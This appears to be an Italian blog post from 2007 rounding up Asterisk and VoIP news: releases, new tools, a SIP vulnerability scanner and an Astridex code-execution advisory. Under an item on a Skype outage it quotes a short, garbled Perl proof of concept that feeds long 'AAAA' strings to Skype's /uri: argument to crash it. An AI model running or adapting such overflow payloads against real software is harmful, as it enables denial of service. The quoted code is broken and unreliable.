E’ di 1 mese fa la notizia, direttamente dal blog Nortel, dell’introduzione sul mercato di un nuovo prodotto basato su software Open Source.

Niente appliance, questa volta sara un cd, contenente una (di moda) soluzione unificata per le comunicazion, pensata per le piccole medie imprese, tra i 30 ed i 500 utenti.

Probabbilmente l’unica vera cosa da notare e’ il core del prodotto, basato su  SIPfoundry sipXecs, una scelta decisamente sensata.

per chi come me fosse stato in vacanza occupandosi di tutto tranne che di voip, ecco una breve panoramica su quanto e’ accaduto nel mondo di asterisk nel frattempo.

30 Luglio - nella mailing list -users di Asterisk e’ copraso un Load balacer per IAX2, che non necessita di Asterisk. Al momento a detta dell’autore e’ in fase di sviluppo, ma da test fatti e’ gia possibile utilizzarlo.
http://www.gradwell.com/tmp/iax_proxy.tar.gz

1 Agosto - SiVuS , e’ stata rilasciata la nuova versione 1.10 per Linux, uno scanner di vulnerabilita SIP.

3 Agosto - [OT] Google Phone, ennesimo annuncio, chissa…

5 Agosto - AsterCRM, e’ nata un alternativa al famoso SugarCRM, pensata per Asterisk, le funzionalita‘ sono ovviamente minori, anche se al momento gia mostra Pop-up when dial in, PoP-up when dial out, Auto-complete, Click-to-dial, Transfer e Exension manager.

7 Agosto - Asterisk 1.2.24 and 1.4.10 released, nel comunicato si consiglia l’upgrade a chi utilizza chan_skinny, che soffriva dell’ennesimo bug. Per il resto sono stati effettuati numerosi fix, in particolare sul chan IAX2.

8 Agosto - chan_mobile, in asterisk_addons. Attraverso questo chan e’ possibile utilizzare cellulari bluetooth come FXO ed il microfono come FXO, bello no

14 Agosto - Iaxclient Branching off 2.0, e’ stato aperto il ramo 2.0 contenente il supporto video in modo ufficiale, prima era presente solo in svn.

15 Agosto - Lightweight Home Security with Indigo and Asterisk, ovvero domotica targata Asterisk,

16 Agosto - [OT ma doveroso] 14 Compleanno di Debian

17 Agosto - Skype, caduto! Le dichiarazioni uffciali negano la possibilita’ di un attacco, ma non molto tempo prima e’ stato pubblicato questo… che abbia influito?!

#!/usr/bin/perl
# Simle Code by Maranax Porex ;D
# Ya Skaypeg!!

for ($i=256; $i>xCCCCC; $i=$i+256){
$eot=’AAAA’ x $i;
call_sp();
}
exit;

sub call_sp(){
$str=â€?\â€?C:\\Program Files\\Skype\\Phone\\Skype.exe\â€? \â€?/uri:$eot\â€?”;
}

Astridex e’ una rubrica web based che permette anche di effettuare chiamate. E’ OpenSource, scritta in PHP, utilizza Asterisk via AMI e salva i dati in u ndatabase MySQL.

Per chi la utilizzasse e’ stata scoperta una vulnerabilita’ piuttosto seria, l’applicazione ha un pagina server side che accetta dei comandi, tuttavia alcuni valori presi in ingresso non verificano il contenuto, permettendo cosi l’esecuzione di codice arbitrario.

L’advisory completo lo potete trovare qui.

Ieri ho visto passare su Freshmeat, Astrisel, incuriosito sono andato a vedere; il progetto (opensource) e’ tutto italiano, consiste in una webapp basata sul framework symfony per vedere e contabilizzare il traffico generato da Asterisk.

Apparentemente le funzionalita’ non sono molte e rispetto ad esempio ad a2billing, ma sicuramente e’ scritto meglio

Magari nei prossimi giorni lo provo, qualcuno l’ha gia fato?